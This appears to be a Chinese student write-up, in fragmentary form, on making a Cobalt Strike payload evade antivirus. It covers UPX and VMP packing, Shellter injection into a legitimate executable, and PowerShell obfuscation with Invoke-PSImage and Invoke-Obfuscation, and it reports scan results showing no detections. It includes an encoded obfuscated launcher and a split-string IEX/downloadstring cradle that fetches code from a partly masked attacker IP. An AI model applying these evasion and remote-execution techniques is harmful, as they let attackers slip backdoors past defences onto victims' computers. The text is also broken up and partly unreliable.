Professional Documents
Culture Documents
2:使用 python,go,易语言等其他语言进行包装。(兼容性略差,否决)
4:使用偏门远控(向日葵)
5:powershell(就逝它了)
metasploit framework
Invoke-obfuscation
kali-wslinux
invoke-psimage
Virustotal
双击运行 cs.bat,填入服务器信息并连接
新建一个监听器,生成一个 payload(artifact.exe)
然后直接扔上 vt
当场暴毙
]TYPE 1{
┌──(root㉿A0L9E8X7-workstation)-[/mnt/c/Users/HP/Desktop]
UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020
经过测试还是会逝。
现在把壳换成 vmp 试试
伟大的进步,但也就止步于此(可能因为 vmp 版本较老,没产生效果)。
]TYPE 2[
尝试使用注入免杀(代表工具:shellter,backdoorfactory)
原文件查杀率
使用 shellter 进行注入:
11 10 01 00 01 01 01 10 11 10
11 00 10 01 11 01 11 01 01 11
www.ShellterProject.com
PE Target: C:\Users\HP\Desktop\DaLiuRen.exe
**********
* Backup *
**********
Backup: Shellter_Backups\DaLiuRen.exe
********************************
* PE Compatibility Information *
********************************
Note: It refers to the minimum required Windows version for the target
******************
* Packed PE Info *
******************
Status: Possibly Not Packed - The EntryPoint is located in the first section!
***********************
* PE Info Elimination *
***********************
Number of Instructions: 10
****************
* Tracing Mode *
****************
Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.
1. PEB.BeingDebugged
2. PEB.NtGlobalFlag
40145c jmp 0040146Eh <0>
*************************
*************************
Make sure that the file exists and that is not used by another process.
************
* Payloads *
************
[7] WinExec
exist at the right moment during the execution of the infected PE file.
******************
* Encoding Stage *
******************
****************************
****************************
***********************************
Please wait...
Binding: Done!
******************
* Encoding Stage *
******************
****************************
****************************
***********************************
***********************************
Please wait...
Binding: Done!
*********************
*********************
Fetching IAT Pointers to Memory Manipulation APIs...
****************
* Payload Info *
****************
Payload: C:\Users\HP\Desktop\aaaaaaaaaaaaaaaaaaaaaaaa.exe
Reflective Loader: NO
***************************
***************************
Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.
Please wait...
*************************
*************************
Type: Engine
Please wait...
**************************
**************************
*************************
*************************
Total Entries: 2
Total Entries: 2
*******************
* Injection Stage *
*******************
Section: .text
Done!
Done!
Injection Completed!
*******************
* PE Checksum Fix *
*******************
**********************
* Verification Stage *
**********************
payload.
Warning!
Injection: Verified!
扔到 VT 上查杀一番,然后 VT 暴毙了
换成 VirScan 再次查杀:
完美,国内的杀软没一个查出来的
静态免杀不代表真的免杀,还是要结合实际情况,少进行敏感操作,避免被行为杀。
我在 exe 方面的极致也就如此了。。。
powershell 的优点:无文件落地,简单,实用,免杀姿势多。
This program comes with ABSOLUTELY NO WARRANTY; for details type show w'.
[+] Done!
PS C:\Users\HP\Desktop>
先把 invokePSimage 下载至本地
PS E:\recovery\Desktop\tools\crypt3r5>
nice!
完全 fud 了,不过不慌,还是要先看运行命令免不免杀。
换成 invoke-obfuscation 试试
Tool :: Invoke-Obfuscation
Twitter :: @danielhbohannon
Blog :: http://danielbohannon.com
Github :: https://github.com/danielbohannon/Invoke-Obfuscation
Version :: 1.8
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
C:\Users\HP\Desktop\banana.ps1
[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> encoding
Invoke-Obfuscation\Encoding> 5
Executed:
CLI: Encoding\5
Result:
( [RuNTime.iNTerOpSERVICes.MarsHal]::pTRtoStRingAnSi( [RuntiME.iNTErOpSERviCEs.marS
Hal]::sECurEstrIngTOGLOBalALloCansi($('76492d1116743f0423413b16050a5345MgB8AHoAdABJ
AFUAUABYAC8AdwBqAHYAOABOAGYAQgBHACsAVwBkAEgATwB5AEEAPQA9AHwAZgA43ADMANABiADYANAAyAG
MAOABlAGMANAA2AGQAOAAzAGIAMQBmAGQAYQA4ADUAOQAyAGMANAA5ADgAZQBjADgAYwAzAGQAMABmAGIAN
QA2ADIAZgA1ADcANwAwAGQAZABhADUAZAA1ADYAYQA1ADAANAA2ADgAMABjAGEANgBjADUAZQAxADIAYwBm
AGYAYwBhADAAYgAxADcAMAA3ADQAYQA2ADcAYQAyADEANgBmAGYAYwAzAGYAOABiAGMANgAwADgAYwAxAGU
ANQAyAGEANwBkADIAOAAxAGUAZABhADIAOQBlADUANAAxADgAMwAwADkAZgBkADEAMAAxAGYANgA3AA=='
| CoNvERTTO-SeCUreSTRInG -K (144..167))) ) )| &( $SHEllId[1]+$sheLlId[13]+'x')
Invoke-Obfuscation\Encoding> 7
Executed:
CLI: Encoding\7
Result:
现在完全刑了,进电脑一声不响。
对于前者,使用语法拼接命令中的关键字(如:http,IEX。拼接后转化
为:downloadstring(''ht';$b='tp://109.xx.xx.xx/a''))';IEX ($a+$b)")
已复制 1 个文件。
C:\Users\HP>backs.ps1.exe
Windows PowerShell
PS C:\Users\HP> cd
NICE!
用超长命令$拼接也可以试试:
感谢老师和同学们的阅读
-==[References]==-
powershell 部分:
https://www.cnblogs.com/chen-w/p/14726549.html
http://www.virscan.org/report/32bf9ca74eba65594c99a907e4274879
00690ae05a6ae6f6a1514b597cc8e714
https://blog.csdn.net/qq_50854790/article/details/124705800
https://cloud.tencent.com/developer/article/1799004?from=artic
le.detail.1895835
https://cloud.tencent.com/developer/article/1078147?from=artic
le.detail.1895835
https://amsi.fail/
EXE 部分:
https://blog.csdn.net/fallfeather/article/details/104274740
ASCII ART
http://patorjk.com/software